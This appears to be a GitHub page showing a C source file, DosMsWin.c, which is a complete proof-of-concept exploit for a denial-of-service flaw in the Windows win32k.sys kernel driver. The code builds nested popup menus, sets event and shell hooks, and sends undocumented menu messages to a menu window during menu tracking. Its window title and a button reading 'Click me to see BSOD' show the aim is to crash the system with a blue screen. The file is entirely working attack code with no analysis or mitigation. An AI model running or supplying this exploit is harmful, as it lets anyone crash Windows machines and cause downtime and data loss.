forked from CCrashBandicot/helpful
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DosMsWin.c
156 lines (135 loc) · 3.95 KB
/
DosMsWin.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
//#include "stdafx.h"
#include <windows.h>
#define BSOD_BUTTON 0x9876
HMENU hMenu[3];
ULONG MenuLevel = 0;
HWND hTargetMenuWnd = 0;
void KeyEvent()
{
INPUT input;
memset(&input, 0, sizeof(input));
input.type = INPUT_KEYBOARD;
input.ki.wVk = VkKeyScanA('1');
SendInput(1, &input, sizeof(input));
Sleep(50);
memset(&input, 0, sizeof(input));
input.type = INPUT_KEYBOARD;
input.ki.wVk = VkKeyScanA('1');
input.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &input, sizeof(input));
}
LRESULT CALLBACK HookProc(
int nCode,
WPARAM wParam,
LPARAM lParam)
{
if (nCode == HSHELL_WINDOWACTIVATED && hTargetMenuWnd != NULL)
{
return SendMessage(hTargetMenuWnd, 0x1E3, 0, 0);
}
return 0;
}
VOID CALLBACK WinEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hWnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime)
{
++MenuLevel;
if (MenuLevel == 1)
{
KeyEvent();
}
else if (MenuLevel == 2)
{
SetWindowsHookEx(WH_SHELL, HookProc, GetModuleHandleA(NULL), GetCurrentThreadId());
hTargetMenuWnd = hWnd;
SendMessage(hTargetMenuWnd, 0x1F2, 0, 0);
}
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_COMMAND:
if (LOWORD(wParam) == BSOD_BUTTON)
{
SetWinEventHook(
EVENT_SYSTEM_MENUPOPUPSTART,
EVENT_SYSTEM_MENUPOPUPSTART,
GetModuleHandleA(NULL),
WinEventProc,
GetCurrentProcessId(),
GetCurrentThreadId(),
WINEVENT_OUTOFCONTEXT);
TrackPopupMenuEx(hMenu[0], 0, 20, 20, hWnd, NULL);
}
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProcA(hWnd, message, wParam, lParam);
}
return 0;
}
int APIENTRY WinMain(
_In_ HINSTANCE hInstance,
_In_opt_ HINSTANCE hPrevInstance,
_In_ PSTR lpCmdLine,
_In_ int nCmdShow)
{
WNDCLASSA Class;
Class.style = 0;
Class.lpfnWndProc = WndProc;
Class.cbClsExtra = 0;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.hIcon = NULL;
Class.hCursor = LoadCursor(0, IDC_ARROW);
Class.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
Class.lpszMenuName = NULL;
Class.lpszClassName = "MyWinClass";
if (RegisterClassA(&Class) != NULL)
{
HWND hMainWnd = CreateWindowA(
"MyWinClass",
"Microsoft Windows Win32k.sys Denial of Service Vulnerability",
WS_POPUPWINDOW | WS_BORDER | WS_CAPTION | WS_VISIBLE,
0, 0, 500, 200,
NULL,
NULL,
hInstance,
NULL);
if (hMainWnd != NULL)
{
HWND hButton = CreateWindowA(
"Button",
"Click me to see BSOD",
WS_VISIBLE | WS_CHILD | BS_DEFPUSHBUTTON,
150, 50, 200, 50,
hMainWnd,
(HMENU)BSOD_BUTTON,
hInstance,
NULL);
if (hButton != 0)
{
hMenu[0] = CreatePopupMenu();
hMenu[1] = CreatePopupMenu();
hMenu[2] = CreatePopupMenu();
AppendMenuA(hMenu[0], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[1], "1");
AppendMenuA(hMenu[1], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)hMenu[2], "1");
AppendMenuA(hMenu[2], MF_POPUP | MF_STRING | MF_MOUSESELECT | MF_BYCOMMAND, (UINT_PTR)0, "1");
MSG msg;
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
}
}
return 0;
}